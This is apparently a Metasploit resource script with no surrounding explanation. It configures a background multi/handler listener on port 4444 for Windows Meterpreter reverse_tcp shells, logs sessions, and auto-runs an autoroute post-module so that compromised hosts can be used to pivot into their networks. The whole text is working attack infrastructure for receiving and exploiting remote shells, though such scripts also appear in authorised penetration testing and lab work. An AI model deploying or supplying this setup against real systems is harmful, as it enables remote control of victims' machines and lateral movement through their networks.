use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false
set AutoRunScript post/multi/manage/autoroute
set SessionLogging true
set ReverseListenerBindAddress 0.0.0.0
set ReverseListenerBindPort 4444
exploit -j -z
